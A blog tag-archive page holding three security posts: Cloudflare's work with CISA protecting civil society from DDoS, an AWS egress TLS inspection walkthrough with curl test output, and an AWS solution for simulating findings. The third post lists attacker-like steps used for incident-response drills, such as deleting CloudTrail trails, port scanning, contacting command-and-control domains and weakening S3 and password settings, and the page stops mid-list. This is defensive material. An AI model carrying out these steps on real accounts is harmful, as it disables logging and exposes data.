Tag Archives: security

Continuing our work with CISA and the Joint Cyber Defense Collaborative to keep vulnerable communities secure online

2024-04-02 Jocelyn Woolbright

Post Syndicated from Jocelyn Woolbright original https://blog.cloudflare.com/cisa-cyber-defense-keep-vulnerable-communities-secure-online

Internet security and reliability has become deeply personal. This holds true for many of us, but especially those who work with vulnerable communities, political dissidents, journalists in authoritarian nations, or human rights advocates. The threats they face, both in the physical world and online, are steadily increasing.

At Cloudflare, our mission is to help build a better Internet. With many of our Impact projects, which protect a range of vulnerable voices from civil society, journalists, state and local governments that run elections, political campaigns, political parties, community networks, and more, we’ve learned how to keep these important groups secure online. But, we can’t do it alone. Collaboration and sharing of best practices with multiple stakeholders to get the right tools into the groups that need them is essential in democratizing access to powerful security tools.

Civil society has historically been the voice for sharing information about attacks that target vulnerable communities, both online and offline. In the last few years, we see governments increasingly appreciating how cyberattacks affect vulnerable voices and make an effort to identify the risks to these communities, and the resources available to protect them.

In March 2023, the US government launched the Summit for Democracy co-hosted by Costa Rica, Zambia, the Netherlands, and South Korea. We’ve written about our work at the summit and commitments on a wide range of actions to help advance human rights online. We were also proud to be included in US Agency for International Development’s (USAID) announcement, as part of the second summit in South Korea in March 2024, as a potential technology partner for the Advancing Digital Democracy Academy initiative, which will offer skills training in cybersecurity, cloud computing, responsible AI to support governments, civil society organizations, and other vulnerable groups.

With multistakeholder collaboration a growing effort, we want to give you insight into our ongoing efforts with the US Cybersecurity and Infrastructure Security Agency through the Joint Cyber Defense Collaborative (JCDC) to work together to raise awareness about threats to civil society, best practices that groups can use to protect themselves online today, and new resources developed for these vulnerable communities.

What types of threats do civil society organizations face?

Civil society organizations, which include non-governmental organizations, community-based organizations, and advocacy groups, face a wide range of threats and challenges that can vary depending on their location, focus areas, and activities. These threats can come from various sources, offline and online, from governments, non-state actors, and external influences.

Since our founding, we’ve provided a set of free services based on the idea that democratizing access to cybersecurity products makes the Internet safer and faster for a broader audience. Since 2014, we’ve continued to strengthen this idea with Project Galileo, providing a higher level of protection to vulnerable voices. Fast forward to 2024, and we now protect more than 2,600 organizations in 111 countries under Project Galileo, allowing us to gain a better understanding of threats these organizations face on a daily basis. In June 2023, we published a report showing that between July 1, 2022, and May 5, 2023, Cloudflare mitigated 20 billion attacks against organizations protected under the project, an average of nearly 67.7 million cyber attacks per day over the 10 month period.

We continue to learn more about cyberattacks against these groups and how to better equip them with the tools they need to stay online. Our Q2 2023 DDoS report, for example, noted that 17.6% of all traffic to nonprofits was DDoS traffic, and that nonprofits were the second most targeted sector for DDoS. In addition, we see prominent civil society organizations, like our partner the International Press Institute, fall victim to a cyber attack after releasing a report identifying multiple DDoS attacks against many independent media outlets in Hungary over a five month period.

What do these attacks look like for a civil society organization?

It is easy to provide overall statistics on the number of cyber attacks we see against organizations under Project Galileo. But that doesn’t provide the whole story on what attacks look like in practice or how organizations can defend against them in real time.

When we were developing our Radar dashboard for the 9th anniversary of Project Galileo, we came across a noteworthy incident that involved an organization reporting on international legal issues, which highlights the importance of having security measures in place, even for organizations that do not believe they are a target. This event occurred between March 17 and March 18, 2023. On March 17, an international arrest warrant was issued for Russian President Vladimir Putin and Russian official Maria Lvova-Belova in connection with an alleged plot to relocate Ukrainian children to Russia.

Before and after this incident, the organization’s website experienced low levels of traffic. However, on March 17, we observed a sudden surge in request traffic, escalating from under 1,000 requests per second to approximately 100,000 requests per second within a four-hour window, reaching its peak at 19:00 UTC. Fortunately, the majority of this traffic was effectively managed by our Web Application Firewall. Another notable spike occurred on March 18, with the peak occurring at 09:45 UTC, surpassing 667,000 requests per second. Almost all of these requests were identified as Distributed Denial of Service (DDoS) attacks, as illustrated in the chart above. Throughout March 18, Cloudflare successfully thwarted a total of 844.4 million requests categorized as application layer DDoS attacks.

This incident highlights a recurring theme that we encounter within Project Galileo. Many organizations may remain unaware of their vulnerability to cyberattacks until their website is targeted by a disruptive DDoS attack. In this instance, the organization maintained its online presence throughout the entire attack, likely only discovering the abnormal surge in traffic after the attack had subsided.

This is just one example of an attack targeting an organization under Project Galileo, but they happen every day. But don’t just take it from us, check out more stories from organizations on how they stay secure online.

Collaborating with CISA through the Joint Cyber Defense Collaborative to identify how to get our services to more vulnerable communities

One of the ways we expand our protections with Project Galileo is through partnerships and collaborations. We currently work with more than 50 civil society organizations who approve organizations for protection under Project Galileo. The role of our civil society partners is essential as they have the knowledge and expertise around organizations that need these types of services.

When JCDC reached out to us about an initiative focused on protecting vulnerable communities online, we were excited to help make resources more accessible from a trusted voice. As governments increasingly identify the need for cybersecurity services for vulnerable communities, they have the ability to make these resources accessible and bring together multiple stakeholders to help promote best security practices. With JCDC, we are collaborating on three working groups to cover a range of topics that include crowdsourcing resources available for at-risk communities, developing new resources for these groups, cyber volunteer programs from companies and civil society, information sharing and development of threat reports and more.

With a range of stakeholders including civil society, tech companies, and CISA, we’ve been able to identify opportunities to build capacity and transparency strategies when it comes to extending products to these communities. We hope that other governments can see these efforts on providing protections to vulnerable communities as a model for effective collaboration.

What are steps you can take right now to ensure your organization’s website and internal teams are protected?

As part of our working groups with JCDC, we focused on enhancing the baseline of cyber hygiene for civil society organizations and improving resilience and response capabilities in the face of a cyberattack. We put together a list of tools and resources that are available for much of these groups that include:

Cloudlare’s Social Impact portal to help organizations navigate how to keep their website secure on Cloudflare.
Zero Trust Security for vulnerable communities: In this roadmap, created by Cloudflare, intended for civil society and at-risk organizations, we hope to demystify the work of Zero Trust security and offer easy to follow steps to boost your cyber security efforts in your organization. This roadmap includes a range of Cloudflare’s security products with case studies for civil society, level of effort to implement, and the teams involved to make the complex world of cyber security more accessible and understandable to a wider audience.
Cloudflare Radar and the Outage Center to track Internet shutdowns: In addition to the route leaks and route hijacks insights, we have Radar notification functionality, enabling organizations to subscribe to notifications about traffic anomalies, confirmed Internet outages, route leaks, or route hijacks.
JCDC’s CISA Awareness site: CISA—through JCDC—has compiled a list of cybersecurity resources intended to help high-risk communities who are at heightened risk of being targeted by cyber threat actors because of their identity or work.

To the future

There is still a lot of work to be done when it comes to protecting vulnerable voices. We hope that by collaborating with a range of stakeholders from governments, civil society, and tech companies we can better share tools and expertise to help these communities navigate the complex digital environments we find ourselves in. We remain committed to this crucial mission in the years to come and look forward to creating more partnerships to expand our products into new areas.
If you are an organization looking for protection under Project Galileo, please visit our website: cloudflare.com/galileo.

TLS inspection configuration for encrypted egress traffic and AWS Network Firewall

2024-04-01 Brandon Carroll

Post Syndicated from Brandon Carroll original https://aws.amazon.com/blogs/security/tls-inspection-configuration-for-encrypted-egress-traffic-and-aws-network-firewall/

In the evolving landscape of network security, safeguarding data as it exits your virtual environment is as crucial as protecting incoming traffic. In a previous post, we highlighted the significance of ingress TLS inspection in enhancing security within Amazon Web Services (AWS) environments. Building on that foundation, I focus on egress TLS inspection in this post.

Egress TLS decryption, a pivotal feature of AWS Network Firewall, offers a robust mechanism to decrypt, inspect the payload, and re-encrypt outbound SSL/TLS traffic. This process helps ensure that your sensitive data remains secure and aligned with your organizational policies as it traverses to external destinations. Whether you’re a seasoned AWS user or new to cloud security, understanding and implementing egress TLS inspection can bolster your security posture by helping you identify threats within encrypted communications.

In this post, we explore the setup of egress TLS inspection within Network Firewall. The discussion covers the key steps for configuration, highlights essential best practices, and delves into important considerations for maintaining both performance and security. By the end of this post, you will understand the role and implementation of egress TLS inspection, and be able to integrate this feature into your network security strategy.

Overview of egress TLS inspection

Egress TLS inspection is a critical component of network security because it helps you identify and mitigate risks that are hidden in encrypted traffic, such as data exfiltration or outbound communication with malicious sites (for example command and control servers). It involves the careful examination of outbound encrypted traffic to help ensure that data leaving your network aligns with security policies and doesn’t contain potential threats or sensitive information.

This process helps ensure that the confidentiality and integrity of your data are maintained while providing the visibility that you need for security analysis.

Figure 1 depicts the traffic flow of egress packets that don’t match the TLS inspection scope. Incoming packets that aren’t in scope of the TLS inspection pass through the stateless engine, and then the stateful engine, before being forwarded to the destination server. Because it isn’t within the scope for TLS inspection, the packet isn’t sent to the TLS engine.

Figure 1: Network Firewall packet handling, not in TLS scope

Now, compare that to Figure 2, which shows the traffic flow when egress TLS inspection is enabled. After passing through the stateless engine, traffic matches the TLS inspection scope. Network Firewall forwards the packet to the TLS engine, where it’s decrypted. Network Firewall passes the decrypted traffic to the stateful engine, where it’s inspected and passed back to the TLS engine for re-encryption. Network Firewall then forwards the packet to its destination.

Figure 2: Network Firewall packet handling, in TLS scope

Now consider the use of certificates for these connections. As shown in Figure 3, the egress TLS connections use a firewall-generated certificate on the client side and the target servers’ certificate on the server side. Network Firewall decrypts the packets that are internal to the firewall process and processes them in clear text through the stateful engine.

Figure 3: Egress TLS certificate usage

By implementing egress TLS inspection, you gain a more comprehensive view of your network traffic, so you can monitor and manage data flows more effectively. This enhanced visibility is crucial in detecting and responding to potential security threats that might otherwise remain hidden in encrypted traffic.

In the following sections, I guide you through the configuration of egress TLS inspection, discuss best practices, and highlight key considerations to help achieve a balance between robust security and optimal network performance.

Additional consideration: the challenge of SNI spoofing

Server Name Indication (SNI) spoofing can affect how well your TLS inspection works. SNI is a component of the TLS protocol that allows a client to specify which server it’s trying to connect to at the start of the handshake process.

SNI spoofing occurs when an entity manipulates the SNI field to disguise the true destination of the traffic. This is similar to requesting access to one site while intending to connect to a different, less secure site. SNI spoofing can pose significant challenges to network security measures, particularly those that rely on SNI information for traffic filtering and inspection.

In the context of egress TLS inspection, a threat actor can use SNI spoofing to circumvent security tools because these tools often use the SNI field to determine the legitimacy and safety of outbound connections. If the threat actor spoofs the SNI field successfully, unauthorized traffic could pass through the network, circumventing detection.

To effectively counteract SNI spoofing, use TLS inspection on Network Firewall. When you use TLS inspection on Network Firewall, spoofed SNIs on traffic within the scope of what TLS inspection looks at are dropped. The spoofed SNI traffic is dropped because Network Firewall validates the TLS server certificate to check the associated domains in it against the SNI.

Set up egress TLS inspection in Network Firewall

In this section, I guide you through the essential steps to set up egress TLS inspection in Network Firewall.

Prerequisites

The example used in this post uses a prebuilt environment. To learn more about the prebuilt environment and how to build a similar configuration in your own AWS environment, see Creating a TLS inspection configuration in Network Firewall. To follow along with this post, you will need a working topology with Network Firewall deployed and an Amazon Elastic Compute Cloud (Amazon EC2) instance deployed in a private subnet.

Additionally, you need to have a certificate generated that you will present to your clients when they make outbound TLS requests that match your inspection configuration. After you generate your certificate, note the certificate body, private key, and certificate chain because you will import these into ACM.

Integration with ACM

The first step is to manage your SSL/TLS certificates through AWS Certificate Manager (ACM).

To integrate with ACM

Obtain a certificate authority (CA) signed certificate, private key, and certificate chain.
Open the ACM console, and in the left navigation pane, choose Certificates.
Choose Import certificates.
In the Certificate details section, paste your certificate’s information, including the certificate body, certificate private key, and certificate chain, into the relevant fields.
Choose Next.
On the Add Tags page, add a tag to your certificate:
1. For Tag key, enter a name for the tag.
2. For Tag value – optional, enter a tag value.
3. Choose Next.
To import the certificate, choose Import.

Note: It might take a few minutes for ACM to process the import request and show the certificate in the list. If the certificate doesn’t immediately appear, choose the refresh icon. Additionally, the Certificate Authority used to create the certificate you import to ACM can be public or private.
Review the imported certificate and do the following:
1. Note the Certificate ID. You will need this ID later when you assign the certificate to the TLS configuration.
2. Make sure that the status shows Issued. After ACM issues the certificate, you can use it in the TLS configuration.
  
  Figure 4: Verify the certificate was issued in ACM

Create a TLS inspection configuration

The next step is to create a TLS inspection configuration. You will do this in two parts. First, you will create a rule group to define the stateful inspection criteria. Then you will create the TLS inspection configuration where you define what traffic you should decrypt for inspection and how you should handle revoked and expired certificates.

To create a rule group

Navigate to VPC > Network Firewall rule groups.
Choose Create rule group.
On the Choose rule group type page, do the following:
1. For Rule group type, select Stateful rule group. In this example, the stateless rule group that has already been created is being used.
2. For Rule group format, select Suricata compatible rule string.
  
  Note: To learn how Suricata rules work and how to write them, see Scaling threat prevention on AWS with Suricata
3. Leave the other values as default and choose Next.
On the Describe rule group page, enter a name, description, and capacity for your rule group, and then choose Next.

Note: The capacity is the number of rules that you expect to have in this rule group. In our example, I set the value to 10, which is appropriate for a demo environment. Production environments require additional thought to the capacity before you create the rule group.
On the Configure rules page, in the Suricata compatible rule string section, enter your Suricata compatible rules line-by-line, and then choose Next.

Note: I don’t provide recommendations for specific rules in this post. You should take care in crafting rules that meet the requirements for your organization. For more information, see Best practices for writing Suricata compatible rules for AWS Network Firewall.
On the Configure advanced settings – optional page, choose Next. You won’t use these settings in this walkthrough.
Add relevant tags by providing a key and a value for your tag, and then choose Next.
On the Review and create page, review your rule group and then choose Create rule group.

To create the TLS inspection configuration

Navigate to VPC > Network Firewall > TLS inspection configurations.
Choose Create TLS inspection configuration.
In the CA certificate for outbound SSL/TLS inspection – new section, from the dropdown menu, choose the certificate that you imported from ACM previously, and then choose Next.

Figure 5: Select the certificate for use with outbound SSL/TLS inspection
On the Describe TLS inspection configuration page, enter a name and description for the configuration, and then choose Next.
Define the scope—the traffic to include in decryption. For this walkthrough, you decrypt traffic that is on port 443. On the Define scope page, do the following:
1. For the Destination port range, in the dropdown, select Custom and then in the box, enter your port (in this example, 443). This is shown in Figure 6.
  
  Figure 6: Specify a custom destination port in the TLS scope configuration
2. Choose Add scope configuration to add the scope configuration. This allows you to add multiple scopes. In this example, you have defined a scope indicating that the following traffic should be decrypted:
  
  Source IP Source Port Destination IP Destination Port
  
  Any Any Any 443
3. In the Scope configuration section, verify that the scope is listed, as seen in Figure 7, and then choose Next.
  
  Figure 7: Add the scope configuration to the SSL/TLS inspection policy
On the Advanced settings page, do the following to determine how to handle certificate revocation:
1. For Check certificate revocation status, select Enable.
2. In the Revoked – Action dropdown, select an action for revoked certificates. Your options are to Drop, Reject, or Pass. A drop occurs silently. A reject causes a TCP reset to be sent, indicating that the connection was dropped. Selecting pass allows the connection to establish.
3. In the Unknown status – Action section, select an action for certificates that have an unknown status. The same three options that are available for revoked certificates are also available for certificates with an unknown status.
4. Choose Next.
Note: The recommended best practice is to set the action to Reject for both revoked and unknown status. Later in this walkthrough, you will set these values to Drop and Allow to illustrate the behavior during testing. After testing, you should set both values to Reject.
Add relevant tags by providing a key and value for your tag, and then choose Next.
Review the configuration, and then choose Create TLS inspection configuration.

Add the configuration to a Network Firewall policy

The next step is to add your TLS inspection configuration to your firewall policy. This policy dictates how Network Firewall handles and applies the rules for your outbound traffic. As part of this configuration, your TLS inspection configuration defines what traffic is decrypted prior to inspection.

To add the configuration to a Network Firewall policy

Navigate to VPC > Network Firewall > Firewall policies.
Choose Create firewall policy.
In the Firewall policy details section, seen in Figure 8, enter a name and description, select a stream exception option for the policy, and then choose Next.

Figure 8: Define the firewall policy details
To attach a stateless rule group to the policy, choose Add stateless rule groups.
Select an existing policy, seen in Figure 9, and then choose Add rule groups.

Figure 9: Select a stateless policy from an existing rule group
In the Stateful rule group section, choose Add stateful rule groups.
Select the newly created TLS inspection rule group, and then choose Add rule group.
On the Add rule groups page, choose Next.
On the Configure advanced settings – optional page, choose Next. For this walkthrough, you will leave these settings at their default values.
On the Add TLS inspection configuration – optional section, seen in Figure 10, do the following:
1. Choose Add TLS inspection configuration.
2. From the dropdown, select your TLS inspection configuration.
3. Choose Next.
  
  Figure 10: Add the TLS configuration to the firewall policy
Add relevant tags by providing a key and a value, and then choose Next.
Review the policy configuration, and choose Create firewall policy.

Associate the policy with your firewall

The final step is to associate this firewall policy, which includes your TLS inspection configuration, with your firewall. This association activates the egress TLS inspection, enforcing your defined rules and criteria on outbound traffic. When the policy is associated, packets from the existing stateful connections that match the TLS scope definition are immediately routed to the decryption engine where they are dropped. This occurs because decryption and encryption can only work for a connection when Network Firewall receives TCP and TLS handshake packets from the start.

Currently, you have an existing policy applied. Let’s briefly review the policy that exists and see how TLS traffic looks prior to applying your configuration. Then you will apply the TLS configuration and look at the difference.

To review the existing policy that doesn’t have TLS configuration

Navigate to VPC > Network Firewall > Firewalls
Choose the existing firewall, as seen in Figure 11.

Figure 11: Select the firewall to edit the policy
In the Firewall Policy section, make sure that your firewall policy is displayed. As shown in the example in Figure 12, the firewall policy DemoFirewallPolicy is applied—this policy doesn’t perform TLS inspection.

Figure 12: Identify the existing firewall policy associated with the firewall
From a test EC2 instance, navigate to an external site that requires TLS encryption. In this example, I use the site example.com. Examine the certificate that was issued. In this example, an external organization issued the certificate (it’s not the certificate that I imported into ACM). You can see this in Figure 13.

Figure 13: View of the certificate before TLS inspection is applied

Returning to the firewall configuration, change the policy to the one that you created with TLS inspection.

To change to the policy with TLS inspection

In the Firewall Policy section, choose Edit.
In the Edit firewall policy section, select the TLS Inspection policy, and then choose Save changes.

Note: It might take a moment for Network Firewall to update the firewall configuration.

Figure 14: Modify the policy applied to the firewall
Return to the test EC2 instance and test the site again. Notice that your customer certificate authority (CA) has issued the certificate. This indicates that the configuration is working as expected and you can see this in Figure 15.

Note: The test EC2 instance must trust the certificate that Network Firewall presents. The method to install the CA certificate on your host devices will vary based on the operating system. For this walkthrough, I installed the CA certificate before testing.

Figure 15: Verify the new certificate used by Network Firewall TLS inspection is seen

Another test that you can do is revoked certificate handling. Example.com provides URLs to sites with revoked or expired certificates that you can use to test.

To test revoked certificate handling

From the command line interface (CLI) of the EC2 instance, do a curl on this page.
Note: The curl -ikv command combines three options:
- -i includes the HTTP response headers in the output
- -k allows connections to SSL sites without certificates being validated
- -v enables verbose mode, which displays detailed information about the request and response, including the full HTTP conversation. This is useful for debugging HTTPS connections.
```
sh-4.2$ curl -ikv https://revoked-rsa-dv.example.com/ example.com?_gl=1*guvyqo*_gcl_au*MTczMzQyNzU3OC4xNzA4NTQ5OTgw
```

At the bottom of the output, notice that the TLS connection was closed. This is what it looks like when the Revoked – Action is set to Drop.

*   Trying 203.0.113.10:443...
* Connected to revoked-rsa-dv.example.com (203.0.113.10) port 443
* ALPN: curl offers h2,http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN: server did not agree on a protocol. Uses default.
* Server certificate:
*  subject: CN=revoked-rsa-dv.example.com
*  start date: Feb 20 21:15:12 2024 GMT
*  expire date: Feb 19 21:15:12 2025 GMT
*  issuer: C=US; ST=VA; O=Custom Org; OU=Custom Unit; CN=Custom Intermediate CA; [email protected]
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* using HTTP/1.x
> GET /?_gl=1*guvyqo*_gcl_au*MTczMzQyNzU3OC4xNzA4NTQ5OTgw HTTP/1.1
> Host: revoked-rsa-dv.example.com
> User-Agent: curl/8.3.0
> Accept: */*
>
* TLSv1.2 (IN), TLS alert, close notify (256):
* Empty reply from server
* Closing connection
* TLSv1.2 (OUT), TLS alert, close notify (256):
curl: (52) Empty reply from server
sh-4.2$

Modify your TLS inspection configuration to Reject instead:
1. Navigate to VPC > Network Firewall > TLS inspection configuration, select the policy, and choose Edit.
2. In the Revoked – Action section, select Reject.
3. Choose Save.

Test the curl again.

sh-4.2$ curl -ikv https://revoked-rsa-dv.example.com/?_gl=1*guvyqo*_gcl_au*MTczMzQyNzU3OC4xNzA4NTQ5OTgw

The output should show that an error 104, Connection reset by peer, was sent.

*   Trying 203.0.113.10:443...
* Connected to revoked-rsa-dv.example.com (203.0.113.10) port 443
* ALPN: curl offers h2,http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN: server did not agree on a protocol. Uses default.
* Server certificate:
*  subject: CN=revoked-rsa-dv.example.com
*  start date: Feb 20 21:17:23 2024 GMT
*  expire date: Feb 19 21:17:23 2025 GMT
*  issuer: C=US; ST=VA; O=Custom Org; OU=Custom Unit; CN=Custom Intermediate CA; [email protected]
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* using HTTP/1.x
> GET /?_gl=1*guvyqo*_gcl_au*MTczMzQyNzU3OC4xNzA4NTQ5OTgw HTTP/1.1
> Host: revoked-rsa-dv.example.com
> User-Agent: curl/8.3.0
> Accept: */*
>
* Recv failure: Connection reset by peer
* OpenSSL SSL_read: Connection reset by peer, errno 104
* Closing connection
* Send failure: Broken pipe
curl: (56) Recv failure: Connection reset by peer
sh-4.2$

As you configure egress TLS inspection, consider the specific types of traffic and the security requirements of your organization. By tailoring your configuration to these needs, you can help make your network’s security more robust, without adversely affecting performance.

Performance and security considerations for egress TLS inspection

Implementing egress TLS inspection in Network Firewall is an important step in securing your network, but it’s equally important to understand its impact on performance and security. Here are some key considerations:

Balance security and performance – Egress TLS inspection provides enhanced security by allowing you to monitor and control outbound encrypted traffic, but it can introduce additional processing overhead. It’s essential to balance the depth of inspection with the performance requirements of your network. Efficient rule configuration can help minimize performance impacts while still achieving the desired level of security.
Optimize rule sets – The effectiveness of egress TLS inspection largely depends on the rule sets that you configure. It’s important to optimize these rules to target specific security concerns relevant to your outbound traffic. Overly broad or complex rules can lead to unnecessary processing, which might affect network throughput.
Use monitoring and logging – Regular monitoring and logging are vital for maintaining the effectiveness of egress TLS inspection. They help in identifying potential security threats and also provide insights into the impact of TLS inspection on network performance. AWS provides tools and services that you can use to monitor the performance and security of your network firewall.

Considering these factors will help ensure that your use of egress TLS inspection strengthens your network’s security posture and aligns with your organization’s performance needs.

Best practices and recommendations for egress TLS inspection

Implementing egress TLS inspection requires a thoughtful approach. Here are some best practices and recommendations to help you make the most of this feature in Network Firewall:

Prioritize traffic for inspection – You might not need the same level of scrutiny for all your outbound traffic. Prioritize traffic based on sensitivity and risk. For example, traffic to known, trusted destinations might not need as stringent inspection as traffic to unknown or less secure sites.
Use managed rule groups wisely – AWS provides managed rule groups and regularly updates them to address emerging threats. You can use AWS managed rules with TLS decryption; however, the TLS keywords will no longer invoke for traffic that has been decrypted by the firewall, within the stateful inspection engine. You can still benefit from the non-TLS rules within managed rule groups, and gain increased visibility into those rules because the decrypted traffic is visible to the inspection engine. You can also create your own custom rules against the inner protocols that are now available for inspection—for example, matching against an HTTP header within the decrypted HTTPS stream. You can use managed rules to complement your custom rules, contributing to a robust and up-to-date security posture.
Regularly update custom rules – Keep your custom rule sets aligned with the evolving security landscape. Regularly review and update these rules to make sure that they address new threats and do not inadvertently block legitimate traffic.
Test configuration changes – Before you apply new rules or configurations in a production environment, test them in a controlled setting. This practice can help you identify potential issues that could impact network performance or security.
Monitor and analyze traffic patterns – Regular monitoring of outbound traffic patterns can provide valuable insights. Use AWS tools to analyze traffic logs, which can help you fine-tune your TLS inspection settings and rules for optimal performance and security.
Plan for scalability – As your network grows, make sure that your TLS inspection setup can scale accordingly. Consider the impact of increased traffic on performance and adjust your configurations to maintain efficiency.
Train your team – Make sure that your network and security teams are well informed about the TLS inspection process, including its benefits and implications. A well-informed team can better manage and respond to security events.

By following these best practices, you can implement egress TLS inspection in your AWS environment, helping to enhance your network’s security while maintaining performance.

Conclusion

Egress TLS inspection is a critical capability for securing your network by providing increased visibility and control over encrypted outbound traffic. In this post, you learned about the key concepts, configuration steps, performance considerations, and best practices for implementing egress TLS inspection with Network Firewall. By decrypting, inspecting, and re-encrypting selected outbound traffic, you can identify hidden threats and enforce security policies without compromising network efficiency.

To learn more about improving visibility in your network with egress TLS inspection, see the AWS Network Firewall developer guide for additional technical details, review AWS security best practices for deploying Network Firewall, and join the AWS Network Firewall community to connect with other users.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

How to generate security findings to help your security team with incident response simulations

2024-04-01 Jonathan Nguyen

Post Syndicated from Jonathan Nguyen original https://aws.amazon.com/blogs/security/how-to-generate-security-findings-to-help-your-security-team-with-incident-response-simulations/

Continually reviewing your organization’s incident response capabilities can be challenging without a mechanism to create security findings with actual Amazon Web Services (AWS) resources within your AWS estate. As prescribed within the AWS Security Incident Response whitepaper, it’s important to periodically review your incident response capabilities to make sure your security team is continually maturing internal processes and assessing capabilities within AWS. Generating sample security findings is useful to understand the finding format so you can enrich the finding with additional metadata or create and prioritize detections within your security information event management (SIEM) solution. However, if you want to conduct an end-to-end incident response simulation, including the creation of real detections, sample findings might not create actionable detections that will start your incident response process because of alerting suppressions you might have configured, or imaginary metadata (such as synthetic Amazon Elastic Compute Cloud (Amazon EC2) instance IDs), which might confuse your remediation tooling.

In this post, we walk through how to deploy a solution that provisions resources to generate simulated security findings for actual provisioned resources within your AWS account. Generating simulated security findings in your AWS account gives your security team an opportunity to validate their cyber capabilities, investigation workflow and playbooks, escalation paths across teams, and exercise any response automation currently in place.

Important: It’s strongly recommended that the solution be deployed in an isolated AWS account with no additional workloads or sensitive data. No resources deployed within the solution should be used for any purpose outside of generating the security findings for incident response simulations. Although the security findings are non-destructive to existing resources, they should still be done in isolation. For any AWS solution deployed within your AWS environment, your security team should review the resources and configurations within the code.

Conducting incident response simulations

Before deploying the solution, it’s important that you know what your goal is and what type of simulation to conduct. If you’re primarily curious about the format that active Amazon GuardDuty findings will create, you should generate sample findings with GuardDuty. At the time of this writing, Amazon Inspector doesn’t currently generate sample findings.

If you want to validate your incident response playbooks, make sure you have playbooks for the security findings the solution generates. If those playbooks don’t exist, it might be a good idea to start with a high-level tabletop exercise to identify which playbooks you need to create.

Because you’re running this sample in an AWS account with no workloads, it’s recommended to run the sample solution as a purple team exercise. Purple team exercises should be periodically run to support training for new analysts, validate existing playbooks, and identify areas of improvement to reduce the mean time to respond or identify areas where processes can be optimized with automation.

Now that you have a good understanding of the different simulation types, you can create security findings in an isolated AWS account.

Prerequisites

[Recommended] A separate AWS account containing no customer data or running workloads
GuardDuty, along with GuardDuty Kubernetes Protection
Amazon Inspector must be enabled
[Optional] AWS Security Hub can be enabled to show a consolidated view of security findings generated by GuardDuty and Inspector

Solution architecture

The architecture of the solution can be found in Figure 1.

Figure 1: Sample solution architecture diagram

A user specifies the type of security findings to generate by passing an AWS CloudFormation parameter.
An Amazon Simple Notification Service (Amazon SNS) topic is created to subscribe to findings for notifications. Subscribed users are notified of the finding through the deployed SNS topic.
Upon user selection of the CloudFormation parameter, EC2 instances are provisioned to run commands to generate security findings.

Note: If the parameter inspector is provided during deployment, then only one EC2 instance is deployed. If the parameter guardduty is provided during deployment, then two EC2 instances are deployed.
For Amazon Inspector findings:
1. The Amazon EC2 user data creates a .txt file with vulnerable images, pulls down Docker images from open source vulhub, and creates an Amazon Elastic Container Registry (Amazon ECR) repository with the vulnerable images.
2. The EC2 user data pushes and tags the images in the ECR repository which results in Amazon Inspector findings being generated.
3. An Amazon EventBridge cron-style trigger rule, inspector_remediation_ecr, invokes an AWS Lambda function.
4. The Lambda function, ecr_cleanup_function, cleans up the vulnerable images in the deployed Amazon ECR repository based on applied tags and sends a notification to the Amazon SNS topic.
  
  Note: The ecr_cleanup_function Lambda function is also invoked as a custom resource to clean up vulnerable images during deployment. If there are issues with cleanup, the EventBridge rule continually attempts to clean up vulnerable images.
For GuardDuty, the following actions are taken and resources are deployed:
1. An AWS Identity and Access Management (IAM) user named guardduty-demo-user is created with an IAM access key that is INACTIVE.
2. An AWS Systems Manager parameter stores the IAM access key for guardduty-demo-user.
3. An AWS Secrets Manager secret stores the inactive IAM secret access key for guardduty-demo-user.
4. An Amazon DynamoDB table is created, and the table name is stored in a Systems Manager parameter to be referenced within the EC2 user data.
5. An Amazon Simple Storage Service (Amazon S3) bucket is created, and the bucket name is stored in a Systems Manager parameter to be referenced within the EC2 user data.
6. A Lambda function adds a threat list to GuardDuty that includes the IP addresses of the EC2 instances deployed as part of the sample.
7. EC2 user data generates GuardDuty findings for the following:
  1. Amazon Elastic Kubernetes Service (Amazon EKS)
    1. Installs eksctl from GitHub.
    2. Creates an EC2 key pair.
    3. Creates an EKS cluster (dependent on availability zone capacity).
    4. Updates EKS cluster configuration to make a dashboard public.
  2. DynamoDB
    1. Adds an item to the DynamoDB table for Joshua Tree.
  3. EC2
    1. Creates an AWS CloudTrail trail named guardduty-demo-trail-<GUID> and subsequently deletes the same CloudTrail trail. The <GUID> is randomly generated by using the $RANDOM function
    2. Runs portscan on 172.31.37.171 (an RFC 1918 private IP address) and private IP of the EKS Deployment EC2 instance provisioned as part of the sample. Port scans are primarily used by bad actors to search for potential vulnerabilities. The target of the port scans are internal IP addresses and do not leave the sample VPC deployed.
    3. Curls DNS domains that are labeled for bitcoin, command and control, and other domains associated with known threats.
  4. Amazon S3
    1. Disables Block Public Access and server access logging for the S3 bucket provisioned as part of the solution.
  5. IAM
    1. Deletes the existing account password policy and creates a new password policy with a minimum length of six characters.
The following Amazon EventBridge rules are created:
